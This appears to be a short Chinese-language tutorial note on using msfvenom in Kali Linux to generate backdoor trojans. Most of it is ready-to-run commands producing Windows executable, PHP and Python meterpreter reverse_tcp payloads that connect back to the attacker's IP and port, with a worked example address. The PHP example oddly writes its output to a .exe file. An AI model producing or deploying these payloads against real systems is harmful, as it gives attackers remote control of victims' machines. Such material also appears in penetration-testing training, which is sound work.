msf-> msfvenom 生成
运行前提:
- kali 操作系统中
- 运行权限为 root 用户 (用 sudo su 命令 切换到root )
- root 根目录下进行输入 msfvenom
1.msfvenom
msfvenom 是 msfpayload 和 msfencode 的组合。将这两个工具集成在一个框架实例中
**进一步解释 ** : msfvenom 是用来生成后门的软件,在目标机上执行后门,在本地监听上线。
2.生成后门
#msfvenom 在bash shell 里使用,不是msf 终端
msfvenom -h //调出help
下面是几个执行模板
//windows 可执行程序后门
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<**自己的ip**> LPORT=<**开个端口接收**> -f exe >shell.exe
// 载荷 : 系统/架构/作用/方式
例子: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=2333 -f exe>shell.exe
//php 脚本后门
msfvenom -p php/meterpreter/reverse_tcp LHOST=<**自己的ip**> LPORT=<**开个端口接收**> -f raw >shell.exe
//python 脚本后门
msfvenom -p python/meterpreter/reverse_tcp LHOST=<**自己的ip**> LPORT=<**开个端口接收**> -f raw >shell.py
-p 使用什么样的攻击载荷
-f 输出什么样的格式 exe
生成木马成功后,从虚拟机移到真实机测试 --> 木马被删除,生成成功 =。=